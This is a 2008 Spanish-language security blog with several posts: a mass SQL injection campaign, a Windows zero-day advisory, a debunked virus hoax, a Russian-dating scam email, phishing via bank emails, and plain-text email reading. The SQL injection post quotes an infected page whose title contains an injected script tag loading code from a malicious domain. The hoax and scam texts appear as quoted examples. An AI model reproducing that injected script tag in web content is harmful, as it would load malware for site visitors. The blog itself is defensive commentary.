jueves, 24 de abril de 2008

Ataque masivo de Inyección SQL.

Apareció una noticia en Security Magazine (23/04/2008) y VirusBulletin (24/04/2008) de que varios miles de sitios legítimos han sido afectados por un ataque de inyección de código SQL; al parecer sitios como algunos bajo la responsabilidad de Naciones Unidas o el gobierno británico fueron exitosamente infectados.
 
Una vez que se ha efectuado la inyección de código, el sitio legítimo redirige al usuario a sitios maliciosos para que se intente bajar un troyano. Los sitios maliciosos son: nmidahena.com, aspder.com y nihaorr1.com; esto puede cambiar porque de hecho estos sitios ya no están en línea, al menos cuando los revisé (aún así, no está de más bloquearlos en el firewall).
 
Ejercicio sencillo de Comprobación:
Si buscan en Google por "script src http  nmidahena.com" o "script src http  nihaorr1.com", encontrarán miles de sitios que fueron inyectados con código. Posteriormente ingresan al sitio y en su navegador le ponen "Ver Código Fuente" para que observen el código de la página web. Una vez hecho esto, buscan por "nmidahena, aspder o nihaorr1"; háganlo todo esto con cuidado (si es posible desde una máquina virtual como Virtual PC de Microsoft que es gratuita). He llevado a cabo esta búsqueda en Google y no todos los sitios que aparecen enlistados continúan infectados. Vale la pena que chequen los suyos, espero no se lleven una sorpresa. He revisado un par de sitios mexicanos "famosos"  y al parecer no se han visto afectados.
 
Por ejemplo, el sitio "http://www.sssri.com/websiteenglish/default.asp" aún sigue afectado, en el código fuente de su página web se observa (al día de hoy) la referencia al sitio "nmidahena.com":
==

<html>
<head>
<meta http-equiv=Content-Type content=text/html; charset=gb2312>
<title>Shanghai Ship and Shipping Res<script src=http://www.nmidahena.com/1.js></script></title>
<script language=javascript >
 function JumpDef()
 {
  window.location.href="../home.htm";
 }
</script>
<style>
 
==

Pueden leer la noticia en:
 
Algunos buenos consejos para mitigar este ataque:
http://www.f-secure.com/weblog/archives/00001427.html
 
 
 

lunes, 21 de abril de 2008

Debilidad día cero: CVE-2008-1436

Para variar, una debilidad de día cero, para la cual no hay parche.
Referencia CVE: CVE-2008-1436
Referencia Microsoft: http://www.microsoft.com/technet/security/advisory/951306.mspx
Referencia Secunia: http://secunia.com/advisories/29867/
Referencias diversas: http://www.scmagazineus.com/Microsoft-warns-of-zero-day-Windows-flaw/article/109171/

Existe una debilidad en  sistemas operativos Microsoft (XP, Vista, Windows 2003 Server) que cuenten con la aplicación IIS (Internet Information Server) o SQL Server configuradas de cierta manera. Existe poca información al respecto, pero al parecer un atacante que ya tenga acceso válido al sistema podría intentar obtener mayores privilegios dentro del sistema.

Ya vi en Milw0rm código de concepto para realizar código de explotación. Supongo que tendremos que esperar hasta mayo para un parche.

Un poco más de información del sitio de Microsoft:
==================
How is IIS affected?
User-provided code running in IIS, for example ISAPI filters and extensions, and ASP.NET code running in full trust may be affected by this vulnerability.

How is SQL Server affected?
SQL Server is affected if a user is granted administrative privileges to load and run code. A user with administrative privileges could execute specially crafted code that could leverage the attack. However, this privilege is not granted by default.
==================

RV: Nuevo Virus

Hoy recibí un hoax. No tiene nada de especial y ya es de un par de años, pero de todas maneras les comparto mi pequeña investigación.

========================


El correo tiene los siguientes elementos de un hoax (engaño):

1.- Dice que quema el disco duro. En la práctica un software no podría quemar el disco duro de una computadora. Algunos teóricos dicen que sí es posible, pero nunca lo he visto en la práctica.

2.- El lenguaje usado es incorrecto. Palabras como "sector Zero" indican una mala traducción. De hecho, este correo falso tiene sus orígenes en el idioma inglés y data del año 2006 (http://www.hoax-slayer.com/olympic-torch-virus-hoax.html).

3.- Microsoft y McAffe el día de hoy (21 de abril de 2008) no tienen ningún aviso de ningún código que sea el más "destructivo que haya existido" como asegura el correo falso. De hecho el coreo no ofrece ninguna liga o referencia a este virus porque de hecho no la hay. El CERT tampoco tiene ninguna información al respecto.

4.- Dice el correo falso que es "preferible recibir este correo 25 veces que recibir el virus"; esta referencia  al número 25 es algo muy común en este tipo de hoaxes, ya que al parecer al autor del hoax original se le ocurrió este número 25 y de ahí se ha seguido copiando en sus diferentes versiones en diferentes idiomas.

Conlcusión: ignorar este tipo de mensajes; instalar un antivirus y actualizarlo; no abrir datos adjuntos de desconocidos, leer el correo en texto claro (plain text), navegar y leer correo desde máquinas virtuales como la gratuita de Microsoft Virtual PC, usar un firewall personal y aplicar nuestro criterio.
Y sobre todo: cuando les pidan reenviar un correo, no lo reenvíen!

Algunas ligas con información adicional:
http://www.vsantivirus.com/hoax-invitation.htm
http://virusattack.virusattack.com.ar/hoaxes/verHoax.php3?idhoax=79


========================

HOAX ORIGINAL:

========================

URGENTISIMOOOOOOOOOOOO !!!
 
 
POR FAVOR, HAZ CIRCULAR ESTE AVISO A TUS AMISTADES, FAMILIA, CONTACTOS !!! 
En los próximos días, debes estar atent@: No abras ningún mensaje con un archivo anexo llamado:   Invitación , 
independientemente de quien te lo envíe. Es un virus que abre   una antorcha olímpica que quema todo el disco duro C de la computadora. Este virus vendrá de una persona conocida que te 
tenia en su lista de direcciones. Es por eso que debes enviar este mensaje a todos tus contactos. 
 
Es preferible recibir 25 veces este correo que recibir el virus y abrirlo. Si recibes el mensaje llamado:  Invitación , aunque sea enviado por un amigo, no lo abras y apaga tu maquina inmediatamente. Es el peor virus anunciado por CNN.  Un nuevo virus ha sido descubierto recientemente que ha sido clasificado por Microsoft como el virus mas destructivo que haya existido . Este virus fue descubierto ayer por la tarde por Mc Afee. Y no hay arreglo aun para esta clase de virus. Este virus destruye simplemente el Sector Zero del Disco Duro, donde la información vital de su función es guardada.
 
 
ENVIA ESTE E-MAIL A QUIENES CONOZCAS. COPIA ESTE CORREO A UNO NUEVO Y MANDALO A TODOS TUS AMIGOS.
 
RECUERDA: 
SI LO ENVIAS A ELLOS, NOS BENEFICIAS A TODOS.

Código malicioso móvil.

¿Les ha llegado propaganda por algún medio anunciando un antivirus (u otras protecciones) para celulares, "hand helds" y "smart phones"? A mi sí. ¿Son necesarios? ¿Debo comprarlo? Yo no he visto ni escuchado que a alguien se le infecte su celular. He escuchado un par de veces infecciones en dispositivos que usan Windows Mobile, pero nada más. Y yo pienso: esto no es nada más que la creación por parte de las empresas antivirus de una necesidad que no tengo.

Yo me pregunto: por qué podría haber código malicioso en celulares y dispositivos similares? ¿Qué ganarían al hacerlos? Casi nadie hace transacciones financieras con su celular, todo eso se hace con las computadoras. En México al menos todavía no es generalizada la navegación en Internet desde celulares. ¿Entonces por qué alguien se podría interesar?

El interés, probablemente, radica en las llamadas para pagar servicios efectuadas desde celulares. Yo soy atacante, doy de alta un servicio digamos de bajar tonos y fotos a celulares y cobro quince pesos por bajarlos al celular del cliente. ¿Me convendría hacer gusanos o troyanos que automáticamente y sin conocimiento del usuario marcaran y bajaran tonos e imágenes? Lo siguiente que sabrá el usuario es que ya no le queda saldo en su cuenta del celular. Si investiga las causas, simplemente verá que el celular marcó a "x" servicio(s) para bajar tonos e imágenes y que se consumieron así los "x" o "y" pesos que tenía de saldo a favor. Al querer decir que él no fue, nos podremos imaginar la respuesta de la empresa celular. Mientras tanto el atacante estará gozando de una "inesperada" ola de llamadas solicitando bajar tonos y todo tipo de contenido puesto a disposición por él y su billetera estará muy feliz.

Y esperen a que el uso de Internet en celulares y dispositivos similares sea mucho más común en el futuro o que se puedan hacer pagos en el "súper" o tiendita de la esquina con el celular (esto ya está como prototipo en otros países) . Las posibilidades serán "infinitas". Pronóstico: no falta demasiado para que empecemos a ver aquí en nuestro país una necesidad real de antivirus y otras protecciones para celulares y dispositivos similares.

Blog: http://www.seguridaddescifrada.blogspot.com/

viernes, 18 de abril de 2008

Spam: La sorpresa que hechiza de Rusia

Hola.
Recientemente recibí un spam cuyo asunto decía "La sorpresa que hechiza de Rusia " que me llamó la atención y decidí dedicarle unos minutos para investigar más al respecto. Les comparto mi pequeña investigación.
===========

El mensaje (que incluyo al final) es un spam probablemente para estafar. El correo no contiene código malicioso (trae una imagen adjunta) y no trata de vender producto alguno, entonces cuál es el objetivo?

La idea, pienso yo, es que la víctima le conteste a la chica, ya que por el texto se asume que está "sola" y "disponible".
Una vez que la víctima la contacta vía correo, durante el intercambio de mensajes seguramente la chica pedirá dinero para trasladarse de Rusia a México (recordemos que ella dice que vive en Rusia). Y ahí está todo el truco, ya que no hay ninguna chica y seguro no vendrá a México a conocer a la víctima.

Este tipo de mensajes "rusos" son aparentemente recientes (del primer trimestre de este año), y han aparecido al menos en España y en México con el mismo texto pero diferentes fotografías de la chica según algunos foros que he visitado. Anexo ligas que respaldan esto:
http://my.opera.com/danitool/blog/show.dml/1817140
http://www.lacoctelera.com/anonimus/post/2008/01/31/me-llamo-alena-rusia
http://www.geomundos.com/internet/ALERTAS_DE_ESTAFA_4/00170-alena_doc_18231.html

Por otro lado, según el servicio de "www.ip2location.com/free.asp", la IP de donde viene este mensaje (que es la 124.166.240.177), está ligada a un ISP en China llamado "CNCGROUP SHAN1XI PROVINCE NETWORK"; lo cual indica que este mensaje pudiera haberse originado en este país asiático.

Yo le escribí (desde una cuenta pública y de prueba) a la supuesta chica para ver su respuesta; todavía no he recibido ningún mensaje.

Conclusión: es un tipo de spam para estafar y como tal habrá que ignorarlo.
Saludos.

CORREO ORIGINAL (no incluyo foto de la chica pero no está de mal ver):
===========
Me llamo Alena!
Mi amiga ha conocido el hombre con la ayuda de un sitio. Aquello el hombre ha dicho que hay un hombre que quiere conocer&#225; tambi&#233;n la mujer rusa y ha dado a mi amiga tu direcci&#243;n del e-mail. Pero aquello el hombre, que ha dado tu direcci&#243;n del e-mail ped&#237;a que diga nunca su nombre, como llaman y donde &#233;l vive. Por eso no dir&#233; a t&#250; el nombre de esto del hombre. No s&#233; hab&#237;a esto la verdad o no, puedes ser no sabes esto el hombre. Pero ahora escribimos uno a otro y este principal. Quer&#237;a conocer&#225; siempre con extranjero por el hombre, porque fui desenga&#241;ado por los hombres rusos.
   Trabajo la enfermera en el hospital de la ciudad. Amo las competiciones deportivas, como ocio, a que juego el voleybol. Amo ir con las amigas. Amo los animales. Ten&#237;a el gato, pero en un d&#237;a esto parte en la calle y no ha vuelto. En la vida I muy sociable, alegre. Tengo muchos amigos y conocido, con que amo comunicar y realizar con ellos el tiempo. Amo mucho tiempo realizar al lago en verano, ba&#241;arse, atezarse y simplemente tener el descanso. La temporada querida - la primavera. En este tiempo esto se hace caliente, es posible quitar la ropa superflua. Agradable mirar, c&#243;mo publicitario hojason declinado. En general m&#237; el rom&#225;ntico. Amo so&#241;ar sobre hermoso. Agradable ir la tarde caliente sobre el amarradero, mirar al r&#237;o peque&#241;o, que la gente es ocupada, aspirar el aire fresco. Cuando en el tiempo de calle malo, puedo parecer algo la pel&#237;cula interesante. Querido agenre - la comedia como las pel&#237;culas de los horrores como. Pero prefiero escuchar la m&#250;sica. Mis divisas ? con la m&#250;sica en la vida ?. En el week-end I con las amigas van a la discoteca, donde decimos de los problemas. Quer&#237;a hacer conocimiento aqu&#237;, pero sobre la discoteca solamente los j&#243;venes, y quiero hacer conocimiento con una persona m&#225;s calificada en Internet.

Si te he interesado, escribe a mi personal e-mail:  medssestra@gmail.com

Los mejores votos
Alena

miércoles, 16 de abril de 2008

Los famosos cuatro dígitos.

"Este mes, tenemos una serie de ofertas para que disfrute unas grandiosas vacaciones en compañía de su familia". Este tipo de correos casi seguro los han recibido de parte de su banco preferido. Claro que para que uno sepa que son "auténticos", nos personalizan el correo incluyendo los últimos tres o cuatro dígitos de nuestra tarjeta de crédito o débito que tenemos con ese banco en particular.

 

¿Qué pasa si alguien recibe un mensaje que en lugar de usar los últimos cuatro dígitos de la tarjeta, usa los primeros cuatro dígitos? "Estimado usuario de la banca en línea con número de inicio en su tarjeta 4555, usted ha ganado un concurso este mes de abril, siga la liga adjunta para hacerse acreedor a un juego de …". ¿Realmente la gente sospecharía de algo? ¿Cuántos usuarios darían click en este tipo de mensajes que como tiene los primeros números de su tarjeta, es por definición válido?

Pequeño detalle: los primeros cuatro dígitos de las tarjetas de crédito o de débito inician en un país o región por lo general con números idénticos, por lo que 4555 será el inicio de miles de tarjetas por ejemplo aquí en México.

 

El problema del phising radica principalmente  en que el banco manda correos válidos a sus usuarios. Punto. Si los usuarios reciben correos válidos de su banco entonces aceptará este tipo o vía de comunicación como válida. Esto es todo lo que el phising necesita. Por lo tanto es "natural" obtener un mensaje diciendo que nuestra cuenta tiene un problema y que debemos hacer click en un link para solucionarlo. La peor idea es haber iniciado el envío de correos válidos con ofertas y otro tipo de mensajes porque ahora los usuarios están acostumbrados a recibir correos y por lo tanto podremos intentar engañarlos.

 

En el mundo físico, la gente estaba acostumbrada a que cuando recibían correspondencia con los logotipos y formatos del banco o de la empresa "X", debía de ser realmente de esa institución. Pero en el mundo electrónico, que un correo tenga un logotipo, colores, lenguaje y formato de una institución no quiere decir que realmente lo manda quien dice ser.

 

Consejo: jamás dar click en ninguna liga incluida en un  correo de bancos o instituciones similares y leer estos correos en formato simple (plain text). ¿Aunque sean válidos? Sí, aunque sean válidos para jamás equivocarse.

miércoles, 2 de abril de 2008

La ventaja de leer sin formato.

A quienes recibimos correos de las listas de distribución de organizaciones dedicadas a la seguridad como SANS, CERT o ISC2, seguramente nos habrá llamado la atención que sus correos vienen sin formato. ¿Por qué en la era del HTML y el texto enriquecido hay todavía gente que se atreve a enviar correos sin formato? La elegancia no se puede dar con texto sin formato.

Pues bien, no es accidente que estos correos de esas organizaciones vengan sin formato, o como se dice en inglés: "plain text". Y no es cuestión de elegancia, sino de seguridad y lo que estas organizaciones hacen es seguir una buena práctica. Existen numerosos ataques hoy en día que aprovechan el texto enriquecido y HTML para explotar una debilidad. Si yo tengo configurado mi cliente de correo preferido (Outlook, Thunderbird) para que lea correos en HTMl y texto enriquecido, estoy abriendo una puerta más a los atacantes. Inclusive los mismos fabricantes en varias ocasiones recomiendan leer correos en texto plano (www.microsoft.com/technet/security/Bulletin/MS05-002.mspx), sin mencionar organizaciones dedicadas a la seguridad que también hacen esta misma recomendación (www.cert.org.mx/boletin/boletin-ant.dsc?id=boletin-UNAMCERT2004-003.html).

Yo desde hace varias semanas configuré mi cliente de correo para que lea TODOS los correos con el texto sin formato. También he decidido enviar todos mis correos sin formato. ¿El resultado? Se puede sobrevivir sin problemas salvo algunos correos que llegan en HTML y en dado caso, si uno confía en quien lo envió, en ese momento aplico el formato HTML. Es simplemente una buena práctica que es importante seguir, al final de cuentas deseamos leer correos  bonitos o leerlos de manera segura? Los invito a que hagan la prueba unos días y decidan si pueden lograr vivir sin el formato.

Les dejo las instrucciones para que en Outlook 2007 lean en formato sin texto:
1. Inicie Outlook 2007.
2. En el menú "Herramientas", haga clic en "Centro de Confianza" y, a continuación, haga clic en "Seguridad del correo electrónico".
3. En "Leer como texto sin formato", haga clic para activar la casilla de verificación "Leer todo el correo estándar en texto sin formato".